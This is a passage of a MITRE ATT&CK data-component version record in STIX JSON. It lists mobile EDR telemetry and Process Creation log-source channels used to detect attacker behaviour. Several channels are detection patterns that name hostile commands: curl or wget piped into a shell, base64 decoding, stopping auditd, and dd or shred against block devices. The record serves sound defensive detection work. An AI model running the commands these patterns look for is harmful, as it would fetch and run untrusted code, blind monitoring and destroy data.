{\"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match\"}, \"root['x_mitre_log_sources'][162]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression\"}, \"root['x_mitre_log_sources'][163]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence\"}, \"root['x_mitre_log_sources'][164]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation\"}, \"root['x_mitre_log_sources'][165]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground\"}, \"root['x_mitre_log_sources'][166]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state\"}, \"root['x_mitre_log_sources'][167]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss\"}, \"root['x_mitre_log_sources'][168]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss\"}, \"root['x_mitre_log_sources'][169]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-13 15:49:16.424000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0032",
                            "external_id": "DC0032"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Creation",
                    "description": "Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream 'eventMessage contains pubsub or broker'"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Execution of binary resolved from $PATH not located in /usr/bin or /bin"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution path inconsistent with baseline PATH directories"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl with suspicious arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve network tools"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to soffice.bin with suspicious macro execution flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution of Microsoft Word, Excel, PowerPoint with macro execution attempts"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process reading browser configuration paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec logs"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve: Processes launched with LD_PRELOAD/LD_LIBRARY_PATH pointing to non-system dirs"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: Process execution context for loaders calling dlopen/dlsym"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "EXECVE"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of unexpected binaries during user shell startup"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of Terminal.app or shell with non-standard environment setup"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC with unusual parent-child process relationships from zsh"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of systemctl or service stop"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of launchctl or pkill"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process::exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of klist, kinit, or tools interacting with ccache outside normal user context"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Execution of non-standard binaries accessing Kerberos APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Electron-based binary spawning shell or script interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Electron app spawning unexpected child process"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/root/.ash_history or /etc/init.d/*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls with high-frequency or known bandwidth-intensive tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or spawn calls to proxy tools or torrent clients"
                        },
                        {
                            "name": "containers:osquery",
                            "channel": "bandwidth-intensive command execution from within a container namespace"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process launch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --info --predicate 'subsystem == \"com.apple.cfprefsd\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security, sqlite3, or unauthorized binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected applications generating outbound DNS queries"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected child process of Safari or Chrome"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or syscall invoking vm artifact check commands (e.g., dmidecode, lspci, dmesg)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of system_profiler, ioreg, kextstat with argument patterns related to VM/sandbox checks"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process writes or modifies files in excluded paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.mail.* exec.*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of memory inspection tools (lldb, gdb, osqueryi)"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "/var/log/vobd.log"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "kubectl exec or kubelet API calls targeting running pods"
                        },
                        {
                            "name": "docker:audit",
                            "channel": "Process execution events within container namespace context"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "process persists beyond parent shell termination"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "background process persists beyond user logout"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of scripts or binaries sourced from mail directories (/var/mail, ~/Maildir)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Preview.app, Safari.app, or Mail.app spawning new processes outside normal patterns"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "process execution across cloud VM"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "systemctl spawning managed processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of processes linked to hijacked sessions (e.g., anomalous parent-child process lineage)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec events where web process starts a shell/tooling"
                        },
                        {
                            "name": "docker:events",
                            "channel": "Docker/Kubernetes audit of exec/attach (kubectl exec) or unexpected child processes inside container"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec of osascript, bash, curl with suspicious parameters"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of container management CLIs (docker, crictl, kubectl) or interpreted shells (sh, bash, python) within container context"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of discovery commands targeting backup binaries, processes, or config paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution logs showing discovery commands like mdfind, system_profiler, or launchctl list"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events OR launchd"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd or process_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process and file events via log stream"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of scripts or binaries spawned from browser processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Browser processes launching unexpected interpreters (osascript, bash)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of defaults, plutil, or common editors (vim/nano) targeting plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "EXECVE"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of bash, python, or perl processes spawned by browser/email client"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, bash, or Terminal initiated from Mail.app or Safari"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of /bin/sh,/bin/bash,/usr/bin/curl,/usr/bin/python by service accounts (e.g., apache, mysql, nobody) immediately after inbound network activity."
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "parent_name in ('sshd','httpd','screensharingd') spawning shells or scripting runtimes."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process activity stream"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "SYSCALL record where exe contains passwd/userdel/chage and auid != root"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Post-login execution of unrecognized child process from launchd or loginwindow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of base64|openssl|xxd|python|perl with arguments matching Base64 flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process command line contains base64, -enc, openssl enc -base64"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: arguments contain Base64-like strings"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "commands containing base64, openssl enc -base64, xxd -p"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of process launched via loginwindow session restore"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: exec + filewrite: ~/.ssh/authorized_keys"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "/var/log/containers/*.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Java apps or other processes with hidden window attributes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process Execution"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve on code or jetbrains-gateway with remote flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: code or jetbrains-gateway launching with --tunnel or --remote"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'processImagePath CONTAINS \"curl\" OR \"osascript\"'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd, shred, wipe targeting block devices"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of sleep or ping command within script interpreted by bash/python"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or socket/connect system calls from processes using crypto libraries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process using AES/RC4 routines unexpectedly"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "execution of known firewall binaries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "type=EXECVE or SYSCALL for /bin/date, /usr/bin/timedatectl, /sbin/hwclock, /bin/cat /etc/timezone, /bin/cat /proc/uptime"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "execve: command like 'date', 'timedatectl', 'hwclock', 'cat /etc/timezone'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process exec events of systemsetup, date, ioreg with command_line parameters indicating time discovery"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: binary == \"/usr/sbin/systemsetup\" and args contains \"-gettimezone\""
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: command LIKE '%systemsetup -gettimezone%' OR '%date%'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of osascript, curl, or unexpected automation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec /usr/bin/pwpolicy"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket(AF_PACKET|AF_INET, SOCK_RAW, *), setsockopt(\u2026 SO_ATTACH_FILTER|SO_ATTACH_BPF \u2026), bpf(cmd=BPF_PROG_LOAD), open/openat path=\"/dev/bpf*\" (BSD/macOS-like) or setcap cap_net_raw."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "KERN messages about eBPF program load/verify or LSM denials related to bpf."
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "open/openat of /dev/bpf*; ioctl BIOCSETF-like operations."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Exec of tcpdump, rvictl, custom tools linked to libpcap.A.dylib; sysextd/systemextensionsctl events for NetworkExtension content filters."
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "/usr/sbin/postfix, /usr/sbin/exim, /usr/sbin/sendmail"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of known flash tools (e.g., flashrom, fwupd)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.firmwareupdater activity or update-firmware binary invoked"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of system tools like dmidecode, lspci, lscpu, dmesg, systemd-detect-virt"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or spawn of 'system_profiler', 'ioreg', 'kextstat', 'sysctl', or calls to sysctl API"
                        },
                        {
                            "name": "macos:endpointSecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Suspicious binaries or scripts interacting with authentication binaries (sshd, gdm, login)"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: Processes unexpectedly invoking Keychain or authentication APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: execve calls where a browser/webview process is parent and child is interpreter (python, sh, ruby) or downloader (curl, wget)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_create: Process creation where parent is Safari/Google Chrome and child is script interpreter or signed-but-unusual helper binary"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:launch"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Shell commands invoked by SQL process such as postgres, mysqld, or mariadbd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of smbclient, smbmap, rpcclient, nmblookup, crackmapexec smb"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: Process execution of \"sharing -l\", \"smbutil view\", \"mount_smbfs\""
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of scp, rsync, curl with remote destination"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "logMessage contains pbpaste or osascript"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call with argv matching known disk enumeration commands (lsblk, parted, fdisk)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process launch of diskutil or system_profiler with SPStorageDataType"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "execution of esxcli with args matching 'storage', 'filesystem', 'core device list'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail.app executing with parameters updating rules state"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/vmkernel.log, /var/log/vmkwarning.log"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec: Exec of ffmpeg, avfoundation-based binaries, or custom signed apps accessing camera"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "exec into pod followed by secret retrieval via API"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_name IN (\"VBoxManage\", \"prlctl\") AND command CONTAINS (\"list\", \"show\")"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec srm|exec openssl|exec gpg"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process execution with LD_PRELOAD or modified library path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of process with DYLD_INSERT_LIBRARIES set"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "process creation events linked to container namespaces executing host-level binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process and signing chain events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchservices events for misleading extensions"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Execution of disguised binaries"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process listening or connecting on non-standard ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd services binding to non-standard ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, connect"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "process or cron activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binaries with unsigned or anomalously signed certificates"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve logging for /usr/bin/systemctl and systemd-run"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Invocation of osascript or dylib injection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of files saved in mail or download directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Terminal, osascript, or other interpreters originating from Mail or Preview"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process events"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unauthorized sudo or shell access, especially leading to file changes in /var/www or /srv/http"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of unexpected terminal or web scripts modifying /Library/WebServer/Documents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of CLI tools like psql, mysql, mongo, sqlite3"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process start of Java or native DB client tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loginwindow or tccd-related entries"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: process_events, launchd, and tcc.db access"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "process execution or network connect from just-created container PID namespace"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of pip, npm, gem, or similar package managers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line invocation of pip3, brew install, npm install from interactive Terminal"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "fork/exec of service via PID 1 (systemd)"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of ssh/scp/sftp without corresponding authentication log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of ssh or sftp without corresponding login event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: execve where exe=/usr/bin/python3 or similar interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of remote desktop app or helper binary"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected processes making network calls based on DNS-derived ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl spawning new processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl activity and process creation"
                        },
                        {
                            "name": "containerd:events",
                            "channel": "New container with suspicious image name or high resource usage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Python, Swift, or other binaries invoking archiving libraries"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Processes linked with libssl or crypto libraries making outbound connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process invoking SSL routines from Security framework"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of binaries located in /etc/init.d/ or systemd service paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binary listed in newly modified LaunchAgent plist"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of bless or nvram modifying boot parameters"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected processes registered with launchd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process launch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, osascript, or unexpected Office processes"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Trust validation failures or bypass attempts during notarization and code signing checks"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "spawned shell or execution environment activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process_exec: image in {/bin/bash,/bin/zsh,/usr/bin/osascript,/usr/bin/python*,/usr/bin/curl,/usr/bin/ssh,/usr/bin/open} AND parent in {Preview, TextEdit, Microsoft Word, Microsoft Excel, AdobeReader, Archive Utility, Finder}"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: exe in {/bin/bash,/bin/sh,/usr/bin/python*,/usr/bin/perl,/usr/bin/php,/usr/bin/node,/usr/bin/curl,/usr/bin/wget,/usr/bin/xdg-open,/usr/bin/ssh,/usr/bin/rundll32 (wine)} AND ppid process is a document viewer/browser"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd/sgdisk with arguments writing to sector 0 or partition table"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of zip, ditto, hdiutil, or openssl by processes not normally associated with archiving"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for chmod, chown, chflags with unusual parameters or targets"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "AdvancedHunting(DeviceEvents, ProcessCreate, ImageLoad, AMSI/ETW derived signals)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execve or dylib load from memory without backing file"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands that alter firewall or start listeners: iptables|nft|ufw|firewall-cmd|pfctl|systemctl start sshd/telnet/dropbear; raw-socket/libpcap tools (tcpdump, tshark, nmap --raw)."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of pfctl, socketfilterfw, launchctl start ssh/telnet, libpcap consumers."
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Shell Execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unusual child process tree indicating attempted recovery after crash"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of binaries/scripts presenting false health messages for security daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of processes mimicking Apple Security & Privacy GUIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, setifflags"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events where path like '%tcpdump%'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd, shred, or wipe with arguments targeting block devices"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "systemctl stop auditd, kill -9 <pid>, or modifications to /etc/selinux/config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, git, or Office processes with network connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - process subsystem"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls for qemu-system*, kvm, or VBoxHeadless"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution for VBoxHeadless, prl_vm_app, vmware-vmx"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process logs"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of interpreters (python, perl), custom binaries, or shell utilities with long arguments containing non-standard tokens"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: arguments contain long, non-standard tokens / custom alphabets"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command line or log output shows non-standard encoding routines"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "commands containing long non-standard tokens or custom lookup tables"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/sbin/installer spawning child process from within /private/tmp or package contents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of dpkg or rpm followed by fork/execve from within postinst, prerm, etc."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execve: Helper tools invoked through XPC executing unexpected binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of modified binary without valid signature"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: exe in (/usr/bin/bash,/usr/bin/sh,/usr/bin/zsh,/usr/bin/python*) AND cmdline matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64\\s*-d|python\\s*-c'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: ParentImage in (Terminal, iTerm2) AND Image in (/bin/zsh,/bin/bash,/usr/bin/python*) AND CommandLine matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64 -D|python -c'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process created with repeated ICMP or UDP flood behavior"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "binary execution of security_authtrampoline"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: exec"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Child processes of Safari, Chrome, or Firefox executing scripting interpreters"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of older or non-standard interpreters"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process execution events for permission modification utilities with command-line analysis"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for chmod, chown, chflags with parameter analysis and target path examination"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process execution monitoring for permission modification utilities with command-line argument analysis"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Invocation of packet generation tools (e.g., hping3, nping) or fork bombs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Execution of flooding tools or compiled packet generators"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve for proxy tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process, socket, and DNS logs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events table"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line containing `trap` or `echo 'trap` written to login shell files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log collect --predicate"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or nanosleep with no stdout/stderr I/O"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd or osascript spawns process with delay command"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "systemd-udevd spawning user-defined action from RUN+="
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:spawn"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'eventMessage contains \"exec\"'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "cat|less|grep accessing .bash_history from a non-shell process"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Process execution via .desktop Exec path from /etc/xdg/autostart or ~/.config/autostart"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of dpkg, rpm, or other package manager with list flag"
                        },
                        {
                            "name": "macos:unifiedlog",
